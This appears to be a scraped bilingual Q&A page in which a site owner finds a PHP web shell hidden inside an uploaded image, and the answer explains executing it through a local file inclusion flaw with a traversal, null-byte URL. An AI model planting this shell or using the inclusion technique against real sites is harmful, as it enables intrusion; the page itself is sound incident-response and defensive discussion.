我的 php 网站被上传为图片的代码入侵..?
昨天我的网站被包括在内.攻击者将 index.php 文件更改为他们自己的文件(以及他们所有的荣耀消息和问候).我已将此通知托管公司(我们在专用服务器上运行),就我而言,我正在尝试修复任何似乎是原因的问题,因为我仍然无法指出我们的具体情况如何服务器受到攻击,但我想我发现了某些可能是罪魁祸首的基于脚本的漏洞.
Yesterday my site was comprised. The attacker changes the index.php file to their own (with all their glory messages and greet). I've notified the hosting company about this (we are running on a dedicated server), and on my part, I'm trying to fix anything that seems to be the cause, cause I'm still unable to point how exactly did our server was attacked, but I think I've found certain script-based loopholes that could possibly be the culprit.
我们的网站有一个图片上传表单,但是所有上传的图片都是通过使用 php getimagesize 函数来验证它们是否确实是图片文件而不是一些代码.仅当图像类型为 IMAGETYPE_GIF、IMAGETYPE_JPEG 或 IMAGETYPE_PNG 时,它们才会被接受.否则,他们将无法上传文件.但是我发现一个上传的图像文件里面包含一个 php 脚本!您可以在这里下载图片.这是一个有效的图像文件,但尝试使用任何文本编辑器打开图像,您会在其中找到一个 php 代码:
Our site has an image uploader form, but all uploaded images are verified if they're indeed image file and not some codes by using php getimagesize function. Only if the image type is IMAGETYPE_GIF, or IMAGETYPE_JPEG, or IMAGETYPE_PNG will they be accepted. Else, they won't be able to upload the file. However I found out that one uploaded image file contains a php script inside it! You can download the image here. It's a valid image file, but try opening the image using any text editor and you will find a php code inside it:
<?php
echo "<pre>"; system($_GET['cmd']); echo "</pre>";
?>
例如,图片上传到此位置 (www.mysite.com/uploads/picodes.jpg).请注意,文件夹上传的权限是 755.世界上有什么方法可以让攻击者执行系统(或任何其他命令,例如 passthru,因为我们发现另一个图像隐藏了与上面相同的代码,但不是系统,它有 passthru 命令),例如,键入 www.mysite.com/uploads/picodes.jpg?cmd=some command ??据我所知,这是无法完成的(如果有人能证明我错了,真的很感激),除非攻击者可以将 jpg 文件重命名为 php,即使这样,这些代码也隐藏在图像的深处(请看里面的图像文本编辑器来理解我想说的)
For example, the image is uploaded to this location (www.mysite.com/uploads/picodes.jpg). Take note that folder uploads' permission is 755. Is there any way in the world the attacker can execute the system (or any other command such as passthru, since we found out another image has the same code hidden as above, but instead of system, it has passthru command), by just for example, typing www.mysite.com/uploads/picodes.jpg?cmd=some command ?? From my knowledge it can't be done (really appreciate it if someone can prove me wrong), unless the attacker can rename the jpg file to php, and even that, these codes are hidden deep inside the image (please see the image inside text editor to understand what I'm trying to say)
为预防起见,我已通过将这些 php 函数(exec、passthru、proc_close、proc_get_status、proc_nice、proc_open、proc_terminate、shell_exec、system)添加到 php.ini 中的 disable_functions 中来禁用它们.
For precautions, I've disabled these php functions (exec, passthru, proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,shell_exec,system) by adding them on the disable_functions in php.ini.
无论如何,我仍然认为攻击者不是通过网络,而是通过服务器漏洞获得访问权限,但我认为我的托管公司不这么认为.
Anyway I still think that the attacker gains access not through web, but through server exploit, but I think my hosting company thinks otherwise.
推荐答案
带有任意 PHP 代码的图像文件不能被直接请求利用,例如http://www.mysite.com/uploads/image.jpg?cmd=somecode
.
Image file with arbitrary PHP code can't be exploited with direct request to it, e.g. http://www.mysite.com/uploads/image.jpg?cmd=somecode
.
不过,它可以与本地文件包含漏洞一起使用.
Still, it can be used with Local File Inclusion vulnerability.
例如,在 index.php 中你使用 include('pages/' . $_GET['page'] . '.php');
,然后攻击者可以上传带有 PHP 代码的图片并像这样执行命令:http://www.mysite.com/index.php?page=../upload/image.jpg?cmd=somecode%00
For example, in index.php you use include('pages/' . $_GET['page'] . '.php');
, then attacker can upload image with PHP code inside and execute commands with smth like this: http://www.mysite.com/index.php?page=../upload/image.jpg?cmd=somecode%00
UPD:将 URL 中的文件更改为页面
UPD: changed file in URL to page
相关文章